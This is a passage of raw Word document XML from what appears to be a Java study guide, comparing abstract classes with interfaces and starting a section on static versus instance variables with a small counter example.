    </w:p>
    <w:p w14:paraId="40EA0DC5"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E1F0FC9" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AD8E54"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7539ED2D"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Object clone() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CCE2F"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new Person(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8EBE35"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223EEFE"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79443F0" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E758B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D76497">
          <v:rect id="_x0000_i1199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF3AD5" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Performance Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380E5C0" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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bstract Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since it can have state (instance variables), it may involve additional memory usage due to the instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAF801" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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terface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically has no state, so it can be lighter. However, calling interface methods might involve slight overhead because of dynamic dispatch (virtual method calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6108FE93" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E758B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B3AACFB">
          <v:rect id="_x0000_i1200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B40CB" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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1"/>
        <w:gridCol w:w="3229"/>
        <w:gridCol w:w="5054"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="4F4DEAE2" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D917B17" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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riteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512C2F45" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="271E451B" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="64536149" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B38C447"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BCED260"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hare common behavior and state with subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58698D02"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hare common behavior across classes with different hierarchies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="7EEC048F" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC82C5F"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 Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="335B2635"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have both abstract and concrete methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AD59618"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only have abstract methods (except default and static methods from Java 8).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="462445DB" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F77ED17"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tance Variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76CF7108"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have instance variables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F302C68"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not have instance variables (only constants).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="2A180268" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7898C59C"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heritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E1F6D2"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gle inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C6A796"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ultiple inheritance (can implement multiple interfaces).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="428F340A" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76210C3F"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ault Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CDFBD20"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have concrete methods with default behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E6778B9"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have default methods from Java 8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="346D3BC6" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ACC2D84"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 Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55FAD82D"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mon base class for shared implementation and state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13440B2B"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when classes need to share common behavior, but not necessarily a common implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D9AFBE3" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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conclusion, choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstract classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to provide a base class with common functionality and shared state, and choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to define common behavior for multiple unrelated classes, especially when the classes need to implement multiple behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73127DD8" w14:textId="406FADA2"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853C313">
          <v:rect id="_x0000_i1201" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761B7E9" w14:textId="4E1A9357" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="006B1296">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc196307547"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of static and instance variables in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="389E16B9" w14:textId="155045BA" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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atic vs Instance Variables in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA84FC"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variables can be categorized into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static variable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instance variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and each serves a different purpose. Understanding their differences and usage is essential for writing efficient and maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C7FDB" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D745E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D3B685D">
          <v:rect id="_x0000_i1202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331B2E5" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Static Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A90030" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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finition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72791B29" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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static variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a variable that belongs to the class, rather than to any specific instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13D90D" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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is shared among all instances of the class and can be accessed directly using the class name without creating an object of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A8397" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1716B6" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Allocation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Static variables are stored in a special memory area called the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Area</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are initialized only once when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF42AC" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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lass-level Variable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A static variable is associated with the class and is common to all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D9261" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ault Value:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If not explicitly initialized, static variables are assigned default values (e.g., null for objects, 0 for numeric types, false for boolean).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D258189" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can access static variables using the class name or via an instance of the class, but it is recommended to use the class name for clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E726A2" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Usage Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C1E1BB"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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD845A"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tatic variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB13C4"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atic int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1F9FB" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499FE4DE"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Class() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BF02B"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unt++; // Static variable shared among all instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D95B17"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5886768" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF3E9C1"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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645B7D4F"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ount: " + count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E324A1"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90101AA"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6A9B40A" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676CE94E"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583F30F9"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0B469FEB"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Class obj1 = new MyClass(); // count becomes 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71BD95"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bj1.display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982D459" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B191E4A"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Class obj2 = new MyClass(); // count becomes 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABF36B"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bj2.display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A63780"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BABE4FE"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C7CC6A8" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DDE18B" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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unt: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022420C" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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unt: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4CBB2C" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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to Use Static Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B567B8" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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hared Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you want to maintain a value that is shared by all instances of a class, such as a counter that tracks the number of instances created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5158C480" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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lass-level Information:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the data should be tied to the class rather than any specific instance, such as configuration constants, global flags, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577475A" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D745E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B1FABB4">
          <v:rect id="_x0000_i1203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF93444" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Instance Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256F61D" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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finition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C6F1B" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
